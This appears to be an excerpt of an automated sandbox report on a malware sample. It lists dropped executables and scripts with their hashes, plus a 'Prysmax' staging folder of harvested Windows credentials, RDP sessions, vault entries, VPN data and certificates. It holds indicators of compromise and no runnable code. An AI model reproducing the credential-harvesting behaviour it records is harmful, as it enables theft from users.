                                                                                                                                                              b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe

                                                                                                                                                              Filesize

                                                                                                                                                              5.3MB

                                                                                                                                                              MD5

                                                                                                                                                              3528bab3defbb275613071b56b382dc6

                                                                                                                                                              SHA1

                                                                                                                                                              9aa148b7ca064be140faa2e08cfe6b58c2a3a8cd

                                                                                                                                                              SHA256

                                                                                                                                                              45ca5d028b1bb143d818a5c15b9c09156cf0cbb67412600a415212a8a7c9553c

                                                                                                                                                              SHA512

                                                                                                                                                              8cdbad6ca0347d2ac417b5fdea159b838a9b47f22e145c4b5f9a46eedca48f212820726c608752fed9de8256773910a0e3310f386ab25fea4f1f872c4ef249b9

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe

                                                                                                                                                              Filesize

                                                                                                                                                              327KB

                                                                                                                                                              MD5

                                                                                                                                                              fda2e2ddccb519a2c1fb72dcaee2de6f

                                                                                                                                                              SHA1

                                                                                                                                                              efd50828acc3e182aa283c5760278c0da1f428a6

                                                                                                                                                              SHA256

                                                                                                                                                              cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57

                                                                                                                                                              SHA512

                                                                                                                                                              28c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413340101\ad3a24ec7b.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.8MB

                                                                                                                                                              MD5

                                                                                                                                                              d3e028854e05689a61d1e5f1e03ed709

                                                                                                                                                              SHA1

                                                                                                                                                              0ffae0bf43311d3635b7e19259be48b0b4b8f2f5

                                                                                                                                                              SHA256

                                                                                                                                                              0061d3bbbcfcda918dc296895fa2023dd6bebfdb8717b27b70f2797c6436d50c

                                                                                                                                                              SHA512

                                                                                                                                                              91ffd3cf2c10ddd76e1ed56d3c37f880957b1fc256a3c47c21f23e5c9400b1494a4cb8d1c814ade60ee5c0597b4d0937685fcd87fce2c3c75d83991cc3531f8b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413350101\5ae5b64f3b.exe

                                                                                                                                                              Filesize

                                                                                                                                                              4.4MB

                                                                                                                                                              MD5

                                                                                                                                                              9cc4bb0a1a21365a640f91896a70167c

                                                                                                                                                              SHA1

                                                                                                                                                              fea8579e98f6c06c1d9fbb451c48f29886afa0c7

                                                                                                                                                              SHA256

                                                                                                                                                              5c10a724fc0d2918f0fb75f934376ed02b24a54013820d45f31c0699f232cf9f

                                                                                                                                                              SHA512

                                                                                                                                                              e923d45771c1b32022ab2b80fe270fa550fe25dfcb0d430e10605c2990c201df399777ac5ade286c7c67194ec4799ac7f8daf4e568b34b0be06c85cf39eafa61

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413360101\f209da0ab6.exe

                                                                                                                                                              Filesize

                                                                                                                                                              4.4MB

                                                                                                                                                              MD5

                                                                                                                                                              514ef35b4134d7761e5c5b657d7a01d9

                                                                                                                                                              SHA1

                                                                                                                                                              9810c95e43be649f5ef76d7447851e78e987f3b3

                                                                                                                                                              SHA256

                                                                                                                                                              51c382a906cb0b91642f302ed21dc74333026ac97027c704e82d23351a5a807a

                                                                                                                                                              SHA512

                                                                                                                                                              a838a21105591bd5a7fc20763020c794917d4239fede6a4cd6ee908130e8e3da94bdc6560e4af877e89480991abe70bb7eed3389620e1caf03955b4d9365be6a

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413370101\2e0d10354c.exe

                                                                                                                                                              Filesize

                                                                                                                                                              2.0MB

                                                                                                                                                              MD5

                                                                                                                                                              311dafc7caa1981ac46344dc06086a1e

                                                                                                                                                              SHA1

                                                                                                                                                              5cda2a58ccd7ab1112a3445f7f11ad31d0195f3c

                                                                                                                                                              SHA256

                                                                                                                                                              60f931aa5fef6b83082dd0c66331100ef9ecf90dc517d4fae256df08e49043c4

                                                                                                                                                              SHA512

                                                                                                                                                              2cada8a0b930da6769970c9471aab55025f5d8ce4ecd7fc15cc8f1771a5805d2bb7b3bef6d1af76de7053e37f25c5e67390ee7eab235c5f11e7af7083bf471d9

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413380101\abecbf00f4.exe

                                                                                                                                                              Filesize

                                                                                                                                                              2.3MB

                                                                                                                                                              MD5

                                                                                                                                                              9a70ef56437f86c6125e996f53233406

                                                                                                                                                              SHA1

                                                                                                                                                              08eaad5730c98e8624c43e889a1b5dd13a4e9c70

                                                                                                                                                              SHA256

                                                                                                                                                              9720bd9aaaae46a1be33aea14f49847d48517f74dae7a7c118fe593108075d28

                                                                                                                                                              SHA512

                                                                                                                                                              4eaaf4f957323b3be4d6686ff53650556c4349369166a3e4ab576c2eb5309e97ad954ec0970965e585894725906f8722960dcbd3eadb3c821b04272f8f523ce1

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413390101\9e9c1f1507.exe

                                                                                                                                                              Filesize

                                                                                                                                                              947KB

                                                                                                                                                              MD5

                                                                                                                                                              be9266b6d07dd5c9f071eed4f55f92ea

                                                                                                                                                              SHA1

                                                                                                                                                              9adad306a6b0a670bea67fae4d8f4f078f95735d

                                                                                                                                                              SHA256

                                                                                                                                                              2ad49aaca12035440c43ac4dc0642b0cdbf99d98d94209626c101ab488341b1f

                                                                                                                                                              SHA512

                                                                                                                                                              a22515ebd7f2078c9f2c318fb3352ed4bb52eb39000d171f5895985ffc68b89b549f5f3f53d7bb8fa4a82ed14032cea6e5f07660bd5bbb32fc444f79e714303c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413400101\f0fa627c66.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.7MB

                                                                                                                                                              MD5

                                                                                                                                                              60c79710a31769fd938b87b6f2c714cb

                                                                                                                                                              SHA1

                                                                                                                                                              0982ef8bc755f3688115c6043325318e8ce174e0

                                                                                                                                                              SHA256

                                                                                                                                                              0d3e93bc1de27fb22a0e523c940c81d825cfe92688360b91c6fea5f587de1cb9

                                                                                                                                                              SHA512

                                                                                                                                                              6a425887119ed799a165edd16cefee6fc51221a7f6980c8d0eec916c0b0396aa77d16c81beb6227c60d57efb881bf1cc66bca34a578558d348e66a6fd66e5df4

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe

                                                                                                                                                              Filesize

                                                                                                                                                              354KB

                                                                                                                                                              MD5

                                                                                                                                                              27f0df9e1937b002dbd367826c7cfeaf

                                                                                                                                                              SHA1

                                                                                                                                                              7d66f804665b531746d1a94314b8f78343e3eb4f

                                                                                                                                                              SHA256

                                                                                                                                                              aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                                                                                                                              SHA512

                                                                                                                                                              ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.2MB

                                                                                                                                                              MD5

                                                                                                                                                              a06b6ca8d9a307911573389aee28fc34

                                                                                                                                                              SHA1

                                                                                                                                                              1981c60d68715c6f55b02de840b091000085c056

                                                                                                                                                              SHA256

                                                                                                                                                              cce36fa950470b05beb043a273be6ddc93c55550d1e7ee1472cf807e2c87887c

                                                                                                                                                              SHA512

                                                                                                                                                              3a8fb1466bff7806dddc88764a5f02db18f77a32e2dd4de3168130a7b3c8c552f97f60766805b0050634d5100c190dbf56e1e3340c424f091c6299410c85fc89

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe

                                                                                                                                                              Filesize

                                                                                                                                                              2.1MB

                                                                                                                                                              MD5

                                                                                                                                                              88796c2e726272bbd7fd7b96d78d1d98

                                                                                                                                                              SHA1

                                                                                                                                                              b359918e124eda58af102bb1565c52a32613c656

                                                                                                                                                              SHA256

                                                                                                                                                              85fa677d5892fe5c794eb9d0e51dd317b8d898e97c49a9a1c4875417c0147556

                                                                                                                                                              SHA512

                                                                                                                                                              71a2c25af532942b5676eb0274ed7dcd75c6a4ce69d3bd9541f162d466abb7be299394111a718774884c3cde8518b11fb926343f93a06853433664065510280c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\261.exe

                                                                                                                                                              Filesize

                                                                                                                                                              88KB

                                                                                                                                                              MD5

                                                                                                                                                              89ccc29850f1881f860e9fd846865cad

                                                                                                                                                              SHA1

                                                                                                                                                              d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                                                                                                                              SHA256

                                                                                                                                                              4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                                                                                                                              SHA512

                                                                                                                                                              0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\36BB.tmp\36CB.tmp\36CC.bat

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              e5ddb7a24424818e3b38821cc50ee6fd

                                                                                                                                                              SHA1

                                                                                                                                                              97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                                                                                                                              SHA256

                                                                                                                                                              4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                                                                                                                              SHA512

                                                                                                                                                              450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\41aa3e5b

                                                                                                                                                              Filesize

                                                                                                                                                              1.2MB

                                                                                                                                                              MD5

                                                                                                                                                              9202cf99e182a6342bf3437b2cb202f7

                                                                                                                                                              SHA1

                                                                                                                                                              83ee7b44104e5aaeb9662e8082a1c28003ef6b4f

                                                                                                                                                              SHA256

                                                                                                                                                              dd6a4a097c815ecc337bae330c1e8ead5ff449ccb1539413cb106f6c94bb4401

                                                                                                                                                              SHA512

                                                                                                                                                              0c45c251bfc687830867863cefa6dfb4c3af69de6caaf8d952068a74e21b3f62194cb3e89bb003e238ee22c2fe95b3440c623dae7cfe74d607b243191fb88de8

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8CYs29WMX.hta

                                                                                                                                                              Filesize

                                                                                                                                                              717B

                                                                                                                                                              MD5

                                                                                                                                                              fb03a0a53699ea8addf857981c37887d

                                                                                                                                                              SHA1

                                                                                                                                                              489f58c64555a4a7cafbaf897ff22d8b155e9955

                                                                                                                                                              SHA256

                                                                                                                                                              c6719b21dcdc285e86ea798704793252d3b0e0992208ad6b11ee2e5475f36433

                                                                                                                                                              SHA512

                                                                                                                                                              8378a2c6525f8321a0f3802f68c749b4634b02c4a4af25f8a17e224f760029fe8668b895958e8581506d2f1763b1eb1d48075a337e98ebe668c13808f3b320dc

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\975168204161

                                                                                                                                                              Filesize

                                                                                                                                                              81KB

                                                                                                                                                              MD5

                                                                                                                                                              8604bff7ffe08b1903dec8aa210636c0

                                                                                                                                                              SHA1

                                                                                                                                                              1c023583112f30cbe22fdc2b26386db9a44d3b99

                                                                                                                                                              SHA256

                                                                                                                                                              398f900d6a799a8cf8d2501dd0bae582c564ab3bd4ebc49be1007d6544b546fa

                                                                                                                                                              SHA512

                                                                                                                                                              1aae3f15d25775b86d932355d6e29321c880290158e2b7ac8555991dc7197e6d0e1197790d98ca1977c1caf2992905daa1f52036ebb81a8141c1785e6e4eb96f

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax.zip

                                                                                                                                                              Filesize

                                                                                                                                                              2.5MB

                                                                                                                                                              MD5

                                                                                                                                                              9d1275e36f513df13bcc68a7d5b124aa

                                                                                                                                                              SHA1

                                                                                                                                                              70a4f794af2c0e6769585091d4c85d5efd0d175c

                                                                                                                                                              SHA256

                                                                                                                                                              6f81b472f8e76db9d8e074b271a5f94201902e551d72270353b07d8879d0e237

                                                                                                                                                              SHA512

                                                                                                                                                              37da644668643fa0adfad830dbdfcdf6f88531132253b539651fb1797b5814ff105c93e6a088d98a29db7e3016a74019efd57b90af4bbcf179d03cde8ebc2db3

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\CREDHIST

                                                                                                                                                              Filesize

                                                                                                                                                              24B

                                                                                                                                                              MD5

                                                                                                                                                              a175a1d6540f05f979478c66e8d18bad

                                                                                                                                                              SHA1

                                                                                                                                                              719bc77d0c06ebcc33759021ee3384ca36395a9b

                                                                                                                                                              SHA256

                                                                                                                                                              0eaabdc1e2452ab0928087056f82145705f4a858331f6e41fcc980c8b4d893f4

                                                                                                                                                              SHA512

                                                                                                                                                              bd9c2fb25f16a3d99fd02a409775eb014dc1feb1e1019b9a4a65d4410257108ad6c594cbe8c7dbb1e65ec9db60ac5b18cfa06bcb0baf3b5f2218585b5250b919

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-3975168204-1612096350-4002976354-1000\3a3da593-9e8f-476f-8baf-2534b57034d4

                                                                                                                                                              Filesize

                                                                                                                                                              468B

                                                                                                                                                              MD5

                                                                                                                                                              0e8df145dbb4809a254c0ad13dcb32fc

                                                                                                                                                              SHA1

                                                                                                                                                              0ccc7902ef556d654c4f10876f3c9771cb69eaf7

                                                                                                                                                              SHA256

                                                                                                                                                              2ab75bc996d9678b0b270b1a41ece694eb09bb5476d464e08e06f7d34a809076

                                                                                                                                                              SHA512

                                                                                                                                                              ccac77cb723f7efa0e7f151f8df62175a7ab8895d38faf1afc35fcbdcc642c06df43d40ff584a7d73c43cff7c83d459a4e9082639d503a7b986de73eddbff10e

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-3975168204-1612096350-4002976354-1000\Preferred

                                                                                                                                                              Filesize

                                                                                                                                                              24B

                                                                                                                                                              MD5

                                                                                                                                                              be0237c9dc957a645b54ff39f3bea979

                                                                                                                                                              SHA1

                                                                                                                                                              04229117093dc71a688cc920fc48bc86e5de4e1c

                                                                                                                                                              SHA256

                                                                                                                                                              6f7936ee460f24cb8b0eb5387d1af136daef7ac33b66d592bc6fa0bfe17ce50a

                                                                                                                                                              SHA512

                                                                                                                                                              eb99c0c4a020d59bcae297bf9bae7683a377a8efc4a7d161748816d2d56d906431ab3122f50229574b080e6a9f88e7cbfef54d8d778a0dfdb1e4bb771dbcbb2c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_2\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                                                                              Filesize

                                                                                                                                                              10KB

                                                                                                                                                              MD5

                                                                                                                                                              563a54e8b5ab3b8204fa4c0f2a5407d9

                                                                                                                                                              SHA1

                                                                                                                                                              f5a35c42840788d359e8971ae960df213117c90e

                                                                                                                                                              SHA256

                                                                                                                                                              821c5f5d18defcd41af2e901bc3fabdf0b137d51dd93462a5ec1dd33f61594ac

                                                                                                                                                              SHA512

                                                                                                                                                              19fb7cdc79611f919f252873d0ff7b6a150dfe03b5795a20a1a98222af3bcc736d3c4943197a5fb567569908114f35bda4fc9f662b67acc227ba47136b60a3a6

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\RDP_Sessions.txt

                                                                                                                                                              Filesize

                                                                                                                                                              499B

                                                                                                                                                              MD5

                                                                                                                                                              13ad7335611fcfb88efa3590a11f2212

                                                                                                                                                              SHA1

                                                                                                                                                              ae8de55bb91229e0e3e082697c2ffa877340c437

                                                                                                                                                              SHA256

                                                                                                                                                              1f93e1567b7b8ddcf5db5ea670eecf1ce717ce72346bb28c131be218f25bf8ed

                                                                                                                                                              SHA512

                                                                                                                                                              14e5393c6ad833c222d9f883006891190ce5811d484be079b820beb10fda99a8b0ec9c2470a091c8f0b118f5319b5425517849a50e72ed3c753beeba0132dc82

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\cmdkey_list.txt

                                                                                                                                                              Filesize

                                                                                                                                                              310B

                                                                                                                                                              MD5

                                                                                                                                                              4468f4ad43b847b566fe190e18b59b59

                                                                                                                                                              SHA1

                                                                                                                                                              6cd3c077afcf7562aac154c2c0409af030f22ec9

                                                                                                                                                              SHA256

                                                                                                                                                              3749a9a1b2688b94f12ed2b37bd718a26b78d6c7e399e456650f79306b802cf5

                                                                                                                                                              SHA512

                                                                                                                                                              cb52bd8250ebb127025a72d81e778b98afd1c3407a5187172bef5e814fb01aeb371461b536e0c6c390d7699cf9559272ef4cf33a773407293f8612d9d6eda1f0

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\windows_vault.txt

                                                                                                                                                              Filesize

                                                                                                                                                              336B

                                                                                                                                                              MD5

                                                                                                                                                              da510ee1496286415109f3ec58d6123c

                                                                                                                                                              SHA1

                                                                                                                                                              8886a1786606d8f5d693a6e87fef39054bd022af

                                                                                                                                                              SHA256

                                                                                                                                                              82c3ed7cb28a633ba026353c6349e8305423e5e1202f8c6030ec1b8706932e73

                                                                                                                                                              SHA512

                                                                                                                                                              f2b5b6e278e6a91e92d0dc296e7837c3d486505a23fe3f574a5c56735a369e30c06942a2695f09a110884d7988b512f02d9a599b82b6abe9bdb3f0e8d8286b77

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\ConnectedDevicesPlatform__connected devices platform certificates.sst

                                                                                                                                                              Filesize

                                                                                                                                                              654B

                                                                                                                                                              MD5

                                                                                                                                                              19ecc1afea43b8df66d9e1c625f594bc

                                                                                                                                                              SHA1

                                                                                                                                                              5f969b3d9aad2d659e1398f608a60b6f8a8e7581

                                                                                                                                                              SHA256

                                                                                                                                                              e5b6c41e7e634ed5250192bd31f25535f742b7926795c7b84a8613c239877f62

                                                                                                                                                              SHA512

                                                                                                                                                              fee3a92a487e370bff6b8c8def3293c6bad185cd0996648b9c8d2d0543d48d0c69f8696bba66052e22ac28a605c2ae3c43fc975405214a7156ae0b20e256c1a7

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Desktop__disconnectdismount.jpg

                                                                                                                                                              Filesize

                                                                                                                                                              1.1MB

                                                                                                                                                              MD5

                                                                                                                                                              15bdfc55f812c57470011709b9d9690d

                                                                                                                                                              SHA1

                                                                                                                                                              466b75bb74863acbb1594f0feb319646a6f553ec

                                                                                                                                                              SHA256

                                                                                                                                                              a1f0503b729978c8a0a8906ed2e60274d483342a852f2afb147bedc0c9ee323a

                                                                                                                                                              SHA512

                                                                                                                                                              1f27be6372f5325ab91e02a490b0f6b5f2225b4b475c95b1d8a23cb7401ba83d382ad731d22e5d46671aef637bace3e50666dae205a9831bcf0e581f99bbc0ae

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Desktop__redoconnect.sys

                                                                                                                                                              Filesize

                                                                                                                                                              937KB

                                                                                                                                                              MD5

                                                                                                                                                              c39ad28c799b7e191515aadb734e9078

                                                                                                                                                              SHA1

                                                                                                                                                              6b8cf42a3694a819782baa176e6dea8b4d03c308

                                                                                                                                                              SHA256

                                                                                                                                                              80350dd7c6b93239dc54486e6d838588f0e32b96aa8f4e9fd38746473594b734

                                                                                                                                                              SHA512

                                                                                                                                                              b051b8fc1f740da836ea496945536c88d6cdea82dfa4f78d1d1fb598ed7b4e18507de78872287bcec19aae21ac67415264def28fa91982e95b98f69e61ecfbc8

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Pictures__connectpush.raw

                                                                                                                                                              Filesize

                                                                                                                                                              224KB

                                                                                                                                                              MD5

                                                                                                                                                              e0cfd741ad4132b584c573911b739df8

                                                                                                                                                              SHA1

                                                                                                                                                              86fd78f7457591df1a7d8ecace76abf6ba00127b

                                                                                                                                                              SHA256

                                                                                                                                                              bd1b6e9492227be770cb0087dbf7894c99ba795f8fbaa2e834ad85cfb6ac78cf

                                                                                                                                                              SHA512

                                                                                                                                                              f900cbe3e295240a55d1dad295a2acf3087e036a61b121edbc979d16ece83f0d3cd5a3346d13e7b7e3ffb0d4bc16713e316149525f4035dd9f835d8fca75a8c9

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Roaming__removeconnect.wvx

                                                                                                                                                              Filesize

                                                                                                                                                              292KB

                                                                                                                                                              MD5

                                                                                                                                                              0b85ab8e6a1a3256c71f417f5b36298b

                                                                                                                                                              SHA1

                                                                                                                                                              71b2c19de437e40f58d3d26fb2801e8b3a33b5e7

                                                                                                                                                              SHA256

                                                                                                                                                              5c80b5beb2ed35af9acd54406b4ec99e919f1db013abdb88c82f1377d580d3a7

                                                                                                                                                              SHA512

                                                                                                                                                              d606c743d115f07266e6b201045f49097466e14ac505038e6e052cf7956d1a774f2cf41160ca1c3068219771e270fe5d20a6de0b77430ccc64f2bd36e27da84f

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Searches__winrt--{s-1-5-21-3975168204-1612096350-4002976354-1000}-.searchconnector-ms

                                                                                                                                                              Filesize

                                                                                                                                                              859B

                                                                                                                                                              MD5

                                                                                                                                                              7dae46bb49b34a9b5ae8659f8a99e9f2

                                                                                                                                                              SHA1

                                                                                                                                                              f43be2c2dff7e8fa22d368626c7ce7c87091a622

                                                                                                                                                              SHA256

                                                                                                                                                              0b7161372fb8e991e9c47f07828bb529904584dd0a1d9f2b98d0909753465b0b

                                                                                                                                                              SHA512

                                                                                                                                                              ab87f6b3efcf4f8377973101e50d412d90b2cce0a543d379b5e8f3cf6f7718357ea73b715ae986c98bcd9327ff27ed40ff73e5cd507f5b579ffe634c58bac0c0

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\WindowsVPN\windows_vpn_connections.txt

                                                                                                                                                              Filesize

                                                                                                                                                              862B

                                                                                                                                                              MD5

                                                                                                                                                              ac9b930e233d016346ff67d6a3f5a9e6

                                                                                                                                                              SHA1

                                                                                                                                                              fcf0e44ae5b569708eeef45826e2f46e611a8eee

                                                                                                                                                              SHA256

                                                                                                                                                              7fb38f1012513704aae95eb7f8cd64c3413f1e64609aa0ec59faa7698330487c

                                                                                                                                                              SHA512

                                                                                                                                                              7188664b63c0538f184225846df1e4ed50f724a9f1fd87c93b341fa107b705b2459afb1632f5e0205938ea0a6535d86e59a440c042e76bf616b3c230113b03d3

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Certificates\personal_certs.txt

                                                                                                                                                              Filesize

                                                                                                                                                              65B

                                                                                                                                                              MD5

                                                                                                                                                              8314c362164d829cb812467c333662a0

                                                                                                                                                              SHA1

                                                                                                                                                              3ae5f774269aaa4fdeaf4e5eb78b7a6f7625ab97

                                                                                                                                                              SHA256

                                                                                                                                                              354644ecf4d6b3ac97c0187d8581bb82cdb8caf8e438755b998c5df0f7fd85ac

                                                                                                                                                              SHA512

                                                                                                                                                              7b32320a2bc82f69a7470168d4515d1fbe1f44ed03f4f30330870732e6c7eec771104bc59a1f9486f4e82e869e1f2b9d84507a976ca5fcd511fdf9e5e1f2b3e8

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.1MB

                                                                                                                                                              MD5

                                                                                                                                                              0aa5410c7565c20aebbb56a317e578da

                                                                                                                                                              SHA1

                                                                                                                                                              1b5fd5739d66cdbb3d08b3d11b45bf49851bc4e0

                                                                                                                                                              SHA256

                                                                                                                                                              88a1f9a40eb7ece8999092b2872b6afde0fb3776e29384c5b00631bb0fca34d1

                                                                                                                                                              SHA512

                                                                                                                                                              4d45855719ac2846c5b49a69f4680200cfe0b325a476c3d6624f5bfd56212ccf9858394c0deb98fdca0ed44e8b63720eadcc67577fdbb874c07d9f15b41e4056

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1r4lwuj2.0et.ps1

                                                                                                                                                              Filesize

                                                                                                                                                              60B

                                                                                                                                                              MD5

                                                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                              SHA1

                                                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                              SHA256

                                                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                              SHA512

                                                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ff_bookmarks_tmp_1310715267.db

                                                                                                                                                              Filesize

                                                                                                                                                              5.0MB

                                                                                                                                                              MD5

                                                                                                                                                              60b3fb36049594725374e5cc011913ac

                                                                                                                                                              SHA1

                                                                                                                                                              585a224cbdb2d5316861e60e6e938e245444017a

                                                                                                                                                              SHA256

                                                                                                                                                              cd306b2cb6984df238d95fa3c16f4969bbf9f3f6d0043cfc83d34da09e34386c

                                                                                                                                                              SHA512

                                                                                                                                                              b02b7d7f5f3a7c37624e098e67a7139249abe1702d45c72b6bdefb20b6732708f1d27dfc694eebab909b034f7287c1c03fba196c2503e63f66c13b03d1e0ab43

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\AlternateServices.bin

                                                                                                                                                              Filesize

                                                                                                                                                              7KB

                                                                                                                                                              MD5

                                                                                                                                                              bacfcf5a0dc5f32f72329acbbc1d255f

                                                                                                                                                              SHA1

                                                                                                                                                              70b66511975b7b9997c6b2115cfed9b60a8c0384

                                                                                                                                                              SHA256

                                                                                                                                                              d92b3c37ac07a26e63b1c4e384a66d59c1cd221225101e7e4b1f81491bf3ca24

                                                                                                                                                              SHA512

                                                                                                                                                              729cf8810f3026cede63c348b3e8a9b02f7141060dda1050978c9b303874012d18b84813f935ba603ab774686063f4a48374550312efafaad71d39b16dfe376d

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                              Filesize

                                                                                                                                                              30KB

                                                                                                                                                              MD5

                                                                                                                                                              98a4c3e4cb81c041b0ac7973399b1af2

                                                                                                                                                              SHA1

                                                                                                                                                              5c9062b830978eadae9e04098518e96dac6ff9b7

                                                                                                                                                              SHA256

                                                                                                                                                              f2ccbdca5198bb8427ab5173fe8fd0a93622746a872e20c03af72bf575add2a6

                                                                                                                                                              SHA512

                                                                                                                                                              3a8c9759fa22d22430af084271d9c3e1ae54f12c7c43f11b4e06277c2e83d5add8b357d68630edff686c7611ca6e54ec20a46e5b8f3838a3645892ce52f33742

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                              Filesize

                                                                                                                                                              29KB

                                                                                                                                                              MD5

                                                                                                                                                              a83697cf636b835d56e82db4d77eda49

                                                                                                                                                              SHA1

                                                                                                                                                              7abe76c4afb863df58d7be59c96b7878accb5249

                                                                                                                                                              SHA256

                                                                                                                                                              e9283b93b0ac490b344151161b94a55ab194c2603810e7c8ea4af9f2c0246a05

                                                                                                                                                              SHA512

                                                                                                                                                              81ba7474604b422618021f5deaa70277c93e4c71e19ee2c654d0842e551f8b894b3d59319b89a788d3f51a8c3e07f46de05ee9b218ddb862eeb8c0b99dd66cf4

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                              Filesize

                                                                                                                                                              29KB

                                                                                                                                                              MD5

                                                                                                                                                              5d67c9638576aa811e872041e55324f7

                                                                                                                                                              SHA1

                                                                                                                                                              d78ada4751350ccc6f3e7e1abc43225f8f686e1b

                                                                                                                                                              SHA256

                                                                                                                                                              f4eca2539a55469a100389cd759da0ade0f4294d3786682b6b0a85b396096e23

                                                                                                                                                              SHA512

                                                                                                                                                              81995e9837531c69df7ffa8a635861f85328251bc2bd01f73fa014159db629afdd0fbbb29cf84a31626ee4135952daac039dd2d1e15a67ce2a243e72fcacc1ae

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\events\events

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              20fa526a0d494092a7f92f5097577ff6

                                                                                                                                                              SHA1

                                                                                                                                                              603959bb017dfaaa22daeb4afde7bea6f6b5a8df

                                                                                                                                                              SHA256

                                                                                                                                                              a97c873a19509618f5df1bb2674768859849d60c3eb4963619faf95c29e878bd

                                                                                                                                                              SHA512

                                                                                                                                                              b87a419908e642acbcc622bd8652251dbf9fb3e54246d303b9bc18f29fe1bf9b02ce65070502cc4119ce62c5f59a7ae8bcbd553af756af2f778004a711ca80cc

